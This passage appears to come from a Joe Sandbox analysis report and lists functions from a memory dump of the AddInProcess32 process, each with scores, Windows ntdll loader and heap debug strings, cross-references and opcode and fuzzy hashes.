                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF426E71900719DFDB61CF28C840BAAB7F5FF44314F1445A9E989EB282D770AA85CFA1
                                                                                                                                                                                                                                        Function 017CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                                                                                                                        • Opcode ID: 3ff0e57287fb6e1484bc3f6cb24d19c9f1a633fe40bf18995cd70fe9363aa4fb
                                                                                                                                                                                                                                        • Instruction ID: 712640d1f0309bb9072a0406a6a4839d70764935a1f061cddaefaaaef08879b9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff0e57287fb6e1484bc3f6cb24d19c9f1a633fe40bf18995cd70fe9363aa4fb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76C1687410838A8FD712CF58C044B6AF7E5BF94B05F0489AEF996DB251E734CA49CB52
                                                                                                                                                                                                                                        Function 017F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • @, xrefs: 017F8591
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017F8421
                                                                                                                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017F855E
                                                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 017F8422
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                                                                                                                        • Opcode ID: 9325e85b183ad03e3a15cd832d4b57ee17acb9619113cca959df6e4a96a7cfee
                                                                                                                                                                                                                                        • Instruction ID: 12a0d698fae5a204cc2bdaa0f650d784131af86ab2040c8214a7ff0a7f1b896c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9325e85b183ad03e3a15cd832d4b57ee17acb9619113cca959df6e4a96a7cfee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6391AB71508745AFDB22EF25CC54EABBBE8BB84744F44092EFA84D6251E374DA048B63
                                                                                                                                                                                                                                        Function 017F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018321D9, 018322B1
                                                                                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 018321DE
                                                                                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018322B6
                                                                                                                                                                                                                                        • .Local, xrefs: 017F28D8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                        • API String ID: 0-1239276146
                                                                                                                                                                                                                                        • Opcode ID: 0f7d40ca5a0f8c260ae15de5d69deb0afac264c5fe363ebf35c1f50b24fb64b1
                                                                                                                                                                                                                                        • Instruction ID: 39fb450bd1abb8762e729e1ee1b21295cce42c3e43b8e93716992ef013b66697
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f7d40ca5a0f8c260ae15de5d69deb0afac264c5fe363ebf35c1f50b24fb64b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63A179319412299BDB25CF68CC88BAAF7B1BF58314F1441E9DA58AB352D730DE80CF91
                                                                                                                                                                                                                                        Function 017F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0183342A
                                                                                                                                                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01833456
                                                                                                                                                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01833437
                                                                                                                                                                                                                                        • RtlDeactivateActivationContext, xrefs: 01833425, 01833432, 01833451
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                                                        • API String ID: 0-1245972979
                                                                                                                                                                                                                                        • Opcode ID: 44253cfa73b56f69d0e19e0890f1b4c05a8a7c59d37b424391f1100204119c00
                                                                                                                                                                                                                                        • Instruction ID: b68d9f48966dcfdc48a8b1d1ff5e6121c1a5ec41fa4fb60e6f72de871652225d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44253cfa73b56f69d0e19e0890f1b4c05a8a7c59d37b424391f1100204119c00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF6101726047169BD7228F1DC881B2BF7E5AF90B60F18851DEA66DB341DB30EA01CBD1
                                                                                                                                                                                                                                        Function 017C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018210AE
                                                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0182106B
                                                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01820FE5
                                                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01821028
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                                                                                                                        • Opcode ID: 2992fb28395424c31df94e4f89ec6aac53525a55a5867b6cd0615959c6214a5a
                                                                                                                                                                                                                                        • Instruction ID: b8a1f4c9eb3bd1e6349da52eb3cb5bdf5e20f45a03c3163a1a55b4dd644ffe88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2992fb28395424c31df94e4f89ec6aac53525a55a5867b6cd0615959c6214a5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5371B2B19043059FCB61DF18C8C5F97BBA8AFA5B54F20046CF9488B286D734D689CBD2
                                                                                                                                                                                                                                        Function 017E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0182A992
                                                                                                                                                                                                                                        • apphelp.dll, xrefs: 017E2462
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0182A9A2
                                                                                                                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0182A998
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                                                                                                                        • Opcode ID: 4083cd5adbbe06432b973d00a1f546ba4e64642313f824bdc5201879ce42926f
                                                                                                                                                                                                                                        • Instruction ID: 3ad0b3a59a0e7c4f0d733aec449b25803b541f69a6c418943f3862a81c1c2273
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4083cd5adbbe06432b973d00a1f546ba4e64642313f824bdc5201879ce42926f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB3128B1B00212ABDB369F5DD8C5A6AB7F9FF88B04F250069F911E7245D7706B81CB80
                                                                                                                                                                                                                                        Function 017D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017D327D
                                                                                                                                                                                                                                        • HEAP: , xrefs: 017D3264
                                                                                                                                                                                                                                        • HEAP[%wZ]: , xrefs: 017D3255
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                        • API String ID: 0-617086771
                                                                                                                                                                                                                                        • Opcode ID: 75a0e4d8bb10f12c47d1d8f7af4630f923d67613a4af98127d067b0bcffc47fc
                                                                                                                                                                                                                                        • Instruction ID: 5bd0fd84a0f1ff4983202626eaf3808176b75e9638bdac39c4ca9cce215df345
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75a0e4d8bb10f12c47d1d8f7af4630f923d67613a4af98127d067b0bcffc47fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F92BC71A046499FDB25CF68C444BAEFBF1FF48300F188099E859AB392D735A942CF51
                                                                                                                                                                                                                                        Function 017D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                        • API String ID: 0-4253913091
                                                                                                                                                                                                                                        • Opcode ID: 3b1cc2a0e01217866b81eaffeed386655e63e1506ad6fb14164c832f7f496fef
                                                                                                                                                                                                                                        • Instruction ID: fa53c9c7ad491f8457973d2bcc57dc3cfe5873af9d23ac6a2d8ec40f2e9d4eb2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b1cc2a0e01217866b81eaffeed386655e63e1506ad6fb14164c832f7f496fef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DF19D70A4060ADFEB26CF68C894BAAF7B5FF45304F1441A9E516DB381D734EA81CB91
                                                                                                                                                                                                                                        Function 017E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: $@
                                                                                                                                                                                                                                        • API String ID: 2994545307-1077428164
                                                                                                                                                                                                                                        • Opcode ID: fc2e87ddf71e0d6c2c99f88d82d1f4cc7d393b5fbc2090851e81dce49e31e0fc
                                                                                                                                                                                                                                        • Instruction ID: fef9bac7a3c690d0912532eacf9c1723669e5da48e1a4d49192fd6ca11600cdc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc2e87ddf71e0d6c2c99f88d82d1f4cc7d393b5fbc2090851e81dce49e31e0fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35C280716083519FE72ACF28C885BABFBE5AF88714F04892DF989C7241D734D945CB92
                                                                                                                                                                                                                                        Function 017BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                        • API String ID: 0-2779062949
                                                                                                                                                                                                                                        • Opcode ID: caf98a70adb4f1c45e07bfb91eeeb2fe3c3bf65e268b92c37bdee42354a3e9bc
                                                                                                                                                                                                                                        • Instruction ID: bb7f7022bdbee12d3def1fa3ef2972429a4aeb4e741f21eadd1b37456db2e354
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caf98a70adb4f1c45e07bfb91eeeb2fe3c3bf65e268b92c37bdee42354a3e9bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80A149729416299BDB21EB68CC88BEAB7B8EF48700F1001E9E909E7250D7359F84CF50
                                                                                                                                                                                                                                        Function 017E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0182A10F
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0182A121
                                                                                                                                                                                                                                        • LdrpCheckModule, xrefs: 0182A117
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-161242083
                                                                                                                                                                                                                                        • Opcode ID: 9bd180af797f3067094ef88ff0edfdfd1017ceac1a772859c0728a6746d3f47f
                                                                                                                                                                                                                                        • Instruction ID: 9215e1224dbbb11745d420d41427a0e1cbbbbc30830202b5612d684441b103e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bd180af797f3067094ef88ff0edfdfd1017ceac1a772859c0728a6746d3f47f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9671CF70A00206DFDB29DF68C988ABEB7F4FF48704F14446DE902E7655E674AA81CB50
                                                                                                                                                                                                                                        Function 017D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                        • API String ID: 0-1334570610
                                                                                                                                                                                                                                        • Opcode ID: 3f71b36b70997a0d715d57bc478b94bcd09613199db05e6e68256fee7a4eb7fe
                                                                                                                                                                                                                                        • Instruction ID: 5b335b50209ff490f1f5f325a00b4ce040c7530dd0b28b5d1f11781b9a5f8418
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f71b36b70997a0d715d57bc478b94bcd09613199db05e6e68256fee7a4eb7fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1618D706043059FDB29CF28C884BAAFBF1FF45704F14959AE459CB296D770E981CB91
                                                                                                                                                                                                                                        Function 017FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 018382DE
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018382E8
                                                                                                                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 018382D7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                                                                                                                        • Opcode ID: 0d34fed6089ad284271bb8af4911a872dc0acbbdd7113e6c2be9afd5fac086b8
                                                                                                                                                                                                                                        • Instruction ID: 6dff70c88e52e4b7ca81f88f53ee4faa8a4f5a0b1624258095952f32915ee5b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d34fed6089ad284271bb8af4911a872dc0acbbdd7113e6c2be9afd5fac086b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C64104B1500305ABC721EB68DC84F5BB7E8EF89750F14492EFA54D33A4E770DA008BA1
                                                                                                                                                                                                                                        Function 0187C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • @, xrefs: 0187C1F1
                                                                                                                                                                                                                                        • PreferredUILanguages, xrefs: 0187C212
                                                                                                                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0187C1C5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                        • API String ID: 0-2968386058
                                                                                                                                                                                                                                        • Opcode ID: 83a3450777f286b5625d6eeae8a31370d8efd242dfb950bfc0f743ca806b7991
                                                                                                                                                                                                                                        • Instruction ID: ecdb7699a7236f170cb26f87eba13e5f728add22383b8300e940ff85f83e3824
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83a3450777f286b5625d6eeae8a31370d8efd242dfb950bfc0f743ca806b7991
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB416F72A1020EEBDB11DED8C895BEEBBB8AB14704F14416AE619F7280E774DB448B50
                                                                                                                                                                                                                                        Function 01854144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                        • API String ID: 0-1373925480
                                                                                                                                                                                                                                        • Opcode ID: 61a6d2c15f736e749cabfc1c88346065be321b1f57a504e5c27e47a0d42c93ad
                                                                                                                                                                                                                                        • Instruction ID: dcf6179ce427fe8318ad3b45764f045106a6a026b915223567cb2d9d960c7ee3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61a6d2c15f736e749cabfc1c88346065be321b1f57a504e5c27e47a0d42c93ad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5414572A0065CCBEB26DBE9C844BACBBB9FF55380F140459DD01EB781EB348A81CB11
                                                                                                                                                                                                                                        Function 01844755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01844888
                                                                                                                                                                                                                                        • LdrpCheckRedirection, xrefs: 0184488F
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01844899
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                                                                                                                        • Opcode ID: 582472af68b6c3d53298b2d80f95781287c0227bf8e14677eaff70a1dbf02930
                                                                                                                                                                                                                                        • Instruction ID: 2c9c017746d8947a83ac8c8b682acb4b9ebad0ff5acae2d02089c106dfa3642c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 582472af68b6c3d53298b2d80f95781287c0227bf8e14677eaff70a1dbf02930
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3341C172A0475D9BEB21CE6CD840B26BBE4AF49754B050669ED48D7312EB31DA01CB91
                                                                                                                                                                                                                                        Function 017D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                        • API String ID: 0-2558761708
                                                                                                                                                                                                                                        • Opcode ID: 82d949fd489393ea1f7d5f8783db89e302ac4e1387ffae9c2b1ad3494e91066f
                                                                                                                                                                                                                                        • Instruction ID: 20d0f4ea872148cef177bc052e1b5adb6f79f0eb6ee55264086e83b674c31fe1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82d949fd489393ea1f7d5f8783db89e302ac4e1387ffae9c2b1ad3494e91066f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D11E4B1358155DFDB1ADA18C8D4BB9F7B4EF40B15F188159F406CB255D730D980C751
                                                                                                                                                                                                                                        Function 018420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • LdrpInitializationFailure, xrefs: 018420FA
                                                                                                                                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018420F3
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01842104
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-2986994758
                                                                                                                                                                                                                                        • Opcode ID: 5e1e463164f0612cbe1440ec4c5bbeec662cf4cce049a36b04156f0beaa6b21e
                                                                                                                                                                                                                                        • Instruction ID: 48ce5c93b1c7d815137ff0603ea41995b8b63a8db19b8aa5221932bceb10a4d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e1e463164f0612cbe1440ec4c5bbeec662cf4cce049a36b04156f0beaa6b21e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6F0FC7568070C7BE724D64CDC53F957769FB84B54F540069FB00B7281D5F0AB44CA91
                                                                                                                                                                                                                                        Function 017D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
